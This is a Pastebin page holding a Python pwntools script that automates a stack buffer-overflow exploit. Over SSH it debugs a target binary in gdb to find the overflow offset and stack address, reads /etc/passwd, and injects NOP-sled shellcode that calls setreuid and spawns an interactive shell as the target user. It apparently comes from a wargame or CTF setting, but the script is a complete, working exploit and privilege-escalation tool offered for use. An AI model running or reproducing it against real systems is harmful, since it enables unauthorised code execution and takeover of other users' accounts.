API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 13th, 2018
117
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.14 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2.  
  3. import argparse
  4. from pwn import *
  5.  
  6. ####################################
  7. ###CONFIG###
  8. ####################################
  9.  
  10. parser = argparse.ArgumentParser(description='H4x yourself a Gibson.')
  11. parser.add_argument('--nops', type=int, nargs='?', default=100, help='the number of nops with which to pad the shellcode')
  12. parser.add_argument('--cyclic-length', type=int, nargs='?', default=512, help='the number of cycles to generate when autodetecting buffer size')
  13. parser.add_argument('-gdb-command', type=str, nargs='?', default='gdb', help='the command which runs gdb on the TARGET machine')
  14. parser.add_argument('-t', '--target-user', type=str, nargs='?', default='root', help='the user who is to be emulated with setreuid')
  15. parser.add_argument('-p', '--password', type=str, nargs='?', default='', help='the password with which to ssh into the server')
  16. parser.add_argument('host', metavar='HOST', type=str, nargs=1, help='the host to which to connect via ssh. FORMAT: username@host:port')
  17. parser.add_argument('executable', metavar='EXECUTABLE', type=str, nargs=1, help='the executable to exploit')
  18. parser.add_argument('-a', '--args', type=str, nargs='?', default='', help='optional arguments to pass to the provided executable')
  19. parser.add_argument('target_function', metavar='TARGET', type=str, nargs=1, help='the function call which is to be targeted for exploitation')
  20.  
  21. args = parser.parse_args()
  22.  
  23. # Connection config
  24. try:
  25.     user = args.host[0].split('@')[0]
  26.     password = args.password
  27.     host = args.host[0].split('@')[1].split(':')[0]
  28.     port = int(args.host[0].split('@')[1].split(':')[1])
  29. except (IndexError, ValueError) as e:
  30.     parser.print_help()
  31.     sys.exit(5)
  32.  
  33. # Exploit config
  34. binary = args.executable[0]
  35. execargs = args.args.split(' ')
  36. vuln_func = args.target_function[0]
  37. target_user = args.target_user
  38.  
  39. # GDB config
  40. gdb_path = args.gdb_command
  41. cyclic_length = args.cyclic_length
  42.  
  43. # Shellcode copnfig
  44. num_nops = args.nops
  45.  
  46. # Context config
  47. context.arch = 'amd64'
  48. context.os = 'linux'
  49.  
  50. ####################################
  51. ###Functions###
  52. ####################################
  53. def gdb_get_attributes(gdb_proc):
  54.     gdb_proc.recvuntil('(gdb)')
  55.     if (len(execargs) != 0):   
  56.         gdb_proc.sendline('set args ' + ' '.join(execargs))
  57.         gdb_proc.recvuntil('(gdb)')
  58.     gdb_proc.sendline('unset env LINES')
  59.     gdb_proc.recvuntil('(gdb)')
  60.     gdb_proc.sendline('unset env COLUMNS')
  61.     gdb_proc.recvuntil('(gdb)')
  62.     gdb_proc.sendline('break * ' + vuln_func)
  63.     gdb_proc.recvuntil('(gdb)')
  64.  
  65.     buf_size = get_vuln_buffer_size(gdb_proc)
  66.     stack_pointer = get_vuln_stack_pointer(gdb_proc)
  67.  
  68.     return {'buf_size' : buf_size, 'stack_pointer' : stack_pointer}
  69.  
  70. def get_vuln_buffer_size(gdb_proc):
  71.     print('Building cyclic pattern to calculate shellcode injection length.')  
  72.     pattern = cyclic_metasploit(cyclic_length)
  73.     gdb_proc.sendline('run')
  74.     gdb_proc.recvuntil('(gdb)')
  75.     gdb_proc.sendline('nexti')
  76.     gdb_proc.recvuntil('Enter the administrator password:')
  77.     gdb_proc.sendline(pattern)
  78.     gdb_proc.recvuntil('(gdb)')
  79.     gdb_proc.sendline('x/2x $rbp')
  80.     rbp_pattern = gdb_proc.recvuntil('(gdb)')
  81.     print(rbp_pattern)
  82.     words = [int(w, 0) for w in rbp_pattern.split('\n')[0].split('\t')[1:]]
  83.     chars = ''.join([pack(w, 32, 'little', True) for w in words])
  84.     print('Found pattern ' + chars + ' in rbp.')
  85.     size = cyclic_metasploit_find(chars)
  86.     print('Detected a buffer size of ' + hex(size) + ' bytes.')
  87.     offset = size + 0x8
  88.     print('Final offset is ' + hex(offset) + ' bytes.')
  89.     return offset
  90.  
  91. def get_vuln_stack_pointer(gdb_proc):
  92.     print('Detecting stack pointer.')
  93.     gdb_proc.sendline('run')
  94.     gdb_proc.sendline('y')
  95.     gdb_proc.recvuntil('(gdb)')
  96.     gdb_proc.sendline('x $rsp')
  97.     rsp_addr = int(gdb_proc.recvuntil('(gdb)').split('\n')[0].split('\t')[0][:-1], 0)
  98.     print('Stack pointer found at address ' + hex(rsp_addr) + '.')
  99.     return rsp_addr
  100.  
  101. ####################################
  102. ###Main###
  103. ####################################
  104. conn = ssh(user=user, password=password, host=host, port=port)
  105.  
  106. print('''
  107. --------------------------------------
  108. STAGE 1: BEGINNING EXPLOIT AUTOCONFIGURATION
  109. --------------------------------------
  110. ''')
  111.  
  112. # Grab information from debugging the vuln binary.
  113. gdb_proc = conn.process(argv=[gdb_path, binary])
  114. attributes = gdb_get_attributes(gdb_proc)
  115. gdb_proc.close()
  116.  
  117. # Grab information from the filesystem.
  118. print('Attempting to grab user id for target user \'' + target_user + '\'.')
  119. etc_passwd = conn.download_data('/etc/passwd').split('\n')
  120. uid = 0
  121. for user in etc_passwd:
  122.     data = user.split(':')
  123.     if (data[0] == target_user):
  124.         uid = int(data[2])
  125.         break
  126. print('Using UID ' + str(uid) + '.')
  127.  
  128. print('''
  129. --------------------------------------
  130. EXPLOIT AUTOCONFIGURATION COMPLETE
  131. --------------------------------------
  132. ''')
  133.  
  134. print('''--------------------------------------
  135. STAGE 2: GENERATING SHELLCODE
  136. --------------------------------------
  137. ''')
  138.  
  139. shellcode = ''
  140. shellcode += asm(shellcraft.setreuid(1002))
  141. shellcode += asm(shellcraft.sh())
  142. print(disasm(shellcode))
  143. shellcode = (asm('nop') * num_nops) + shellcode
  144. #print(disasm(shellcode))
  145. shellcode += asm('nop') * max((attributes['buf_size'] - len(shellcode)), 0x8)
  146.  
  147. print('\nPadded shellcode length: ' + hex(len(shellcode)) + ' bytes.')
  148.  
  149. entry_point = attributes['stack_pointer'] + (num_nops // 2)
  150. print('Guessed entry point: ' + hex(entry_point) + '\n')
  151. shellcode += p64(entry_point)
  152.  
  153. print(hexdump(shellcode))
  154.  
  155. print('''
  156. --------------------------------------
  157. SHELLCODE GENERATION COMPLETE
  158. --------------------------------------
  159. ''')
  160.  
  161. print('''--------------------------------------
  162. STAGE 3: ATTEMPTING EXPLOIT
  163. --------------------------------------
  164. ''')
  165.  
  166. vuln_proc = conn.process(argv=[binary] + execargs)
  167. vuln_proc.sendline(shellcode)
  168. vuln_proc.recvuntil('$ ')
  169. vuln_proc.sendline('whoami')
  170. whoami_result = vuln_proc.recvuntil('$ ').split('\n')[0]
  171. if (whoami_result == target_user):
  172.     print('You got the shell :D')
  173.     vuln_proc.sendline('cd /home/' + target_user)
  174. else:
  175.     print('Something went wrong. You got the shell, but are the wrong user D:')
  176. vuln_proc.interactive(prompt = pwnlib.term.text.bold_red('\x08 \x08\x08 \x08' + whoami_result + '@' + host) + ':# ')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!